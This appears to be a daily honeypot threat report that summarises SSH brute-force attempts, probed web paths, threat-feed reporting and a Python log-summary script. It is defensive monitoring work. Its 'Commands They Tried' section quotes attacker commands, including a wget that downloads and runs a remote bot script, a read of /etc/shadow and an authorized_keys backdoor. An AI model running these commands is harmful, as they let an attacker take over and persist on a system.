🔴 high

Daily Threat Report

1,243 SSH Connections
3,891 Login Attempts
47 Commands Run
198 SSH Unique IPs
723 Protocol Events
134 Protocol IPs
8 Web Honeypot Hits
3 Web Honeypot IPs

Top Passwords Tried

  1. 123456
  2. admin
  3. root
  4. password
  5. 12345

๐ŸŒ WEB HONEYPOT โ€” Galah LLM

AI-generated fake HTTP responses served to 8 scanner requests from 3 unique IPs. Model: qwen2.5:0.5b (local, offline).

Top Paths Probed

  1. /wp-login.php
  2. /admin
  3. /.env
  4. /phpmyadmin/
  5. /cgi-bin/luci

Top User-Agents

  1. sqlmap/1.7.8
  2. Mozilla/5.0 (compatible; Googlebot/2.1)
  3. Masscan/1.3

# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
→ 14 IPs → AbuseIPDB  (community confidence scores updated)
→ 14 IPs → AlienVault OTX  (pulse indicators added)
→ 14 IPs → Blocklist.de  (auto-ban list updated)
→ 14 IPs → DShield/SANS  (global threat feed updated)

🤣 ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

🔑 Hall of Shame — Passwords

iloveyou
letmein
admin1234
qwerty123
fuckyou
opensesame
password1
123456789

💻 Commands They Tried

busybox wget http://194.165.16.78/bot.sh -O /tmp/.x && chmod +x /tmp/.x && /tmp/.x
cat /etc/shadow
history -c
chmod 777 /tmp/.x
echo AAAA >> /root/.ssh/authorized_keys
python3 -c import pty;pty.spawn(/bin/bash)

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Over the past 24 hours, the honeypot recorded intense activity. The majority of attackers relied on classic SSH brute-force, cycling through default credentials typically found on routers and IP cameras. Three IPs showed lateral movement patterns after gaining simulated login access, immediately running reconnaissance commands (uname -a, cat /etc/passwd) and attempting to download payloads from known C2 infrastructure via wget.

SSH Activity (Cowrie)

The SSH honeypot logged 1,243 connection attempts and 3,891 login tries from 198 unique IPs. After gaining simulated access, attackers executed 47 commands — the most common being system fingerprinting (uname -a, id, cat /proc/cpuinfo) followed by automated dropper scripts attempting to fetch and execute remote payloads.
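As an added illustration (not the report's own honeypot-report.sh tooling), this is the kind of aggregation that produces the figures above, run over a few constructed events in the shape of Cowrie's JSON log (eventid, src_ip, username, password, input); it also flags commands that fetch a remote payload, the dropper pattern the report calls out.

```python
import json
from collections import Counter

# Constructed sample events mirroring Cowrie's JSON log schema (not real honeypot data).
SAMPLE_LOG = """
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.10","session":"a1","timestamp":"2026-04-25T01:00:00Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.10","username":"root","password":"123456","session":"a1"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.10","username":"admin","password":"admin","session":"a1"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.7","session":"b2","timestamp":"2026-04-25T01:02:00Z"}
{"eventid":"cowrie.login.success","src_ip":"198.51.100.7","username":"root","password":"123456","session":"b2"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.7","input":"uname -a","session":"b2"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.7","input":"wget http://192.0.2.5/bot.sh -O /tmp/.x","session":"b2"}
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.10","session":"c3","timestamp":"2026-04-25T01:05:00Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.10","username":"root","password":"password","session":"c3"}
"""

DROPPER_MARKERS = ("wget ", "curl ", "tftp ")  # fetch-and-execute pattern called out in the report

def summarize(log_text, top_n=5):
    """Aggregate Cowrie-style JSON events into the counters the daily report prints."""
    connections = logins = commands = 0
    ips, passwords = set(), Counter()
    droppers = []  # (src_ip, command) for commands that fetch a remote payload
    for line in filter(None, map(str.strip, log_text.splitlines())):
        ev = json.loads(line)
        eid = ev.get("eventid", "")
        ips.add(ev.get("src_ip"))
        if eid == "cowrie.session.connect":
            connections += 1
        elif eid in ("cowrie.login.failed", "cowrie.login.success"):
            logins += 1  # every credential try counts, whether or not the honeypot "accepted" it
            passwords[ev.get("password", "")] += 1
        elif eid == "cowrie.command.input":
            commands += 1
            cmd = ev.get("input", "")
            if any(marker in cmd for marker in DROPPER_MARKERS):
                droppers.append((ev.get("src_ip"), cmd))
    return {
        "ssh_connections": connections,
        "login_attempts": logins,
        "commands_run": commands,
        "unique_ips": len(ips),
        "top_passwords": [p for p, _ in passwords.most_common(top_n)],
        "droppers": droppers,
    }

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```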

Multi-Protocol Activity (OpenCanary)

723 events were detected across 134 unique IPs targeting emulated network services. The most attacked services were:

  • MySQL — repeated access attempts using root with no password, consistent with automated scanners exploiting misconfigured database servers.
  • Redis — exploitation attempts via CONFIG SET to write attacker-controlled SSH public keys into /root/.ssh/authorized_keys, a well-documented Redis RCE vector.

14 IPs were automatically reported to AbuseIPDB, Blocklist.de, SANS DShield, and AlienVault OTX.

HTTP Web Honeypot (Galah LLM)

The web honeypot received 8 HTTP requests from real scanners across 3 unique IPs. This marks the first operational night of the Galah LLM honeypot, live since April 24, 2026. Each attacker received a dynamically generated fake response from the local AI model qwen2.5:0.5b running via Ollama — no internet connection required for inference.

Top probed paths: /wp-login.php, /admin, /.env, /phpmyadmin/, /cgi-bin/luci.

โ† All Reports ๐Ÿ›ก๏ธ Subscribe to blocklists โ†’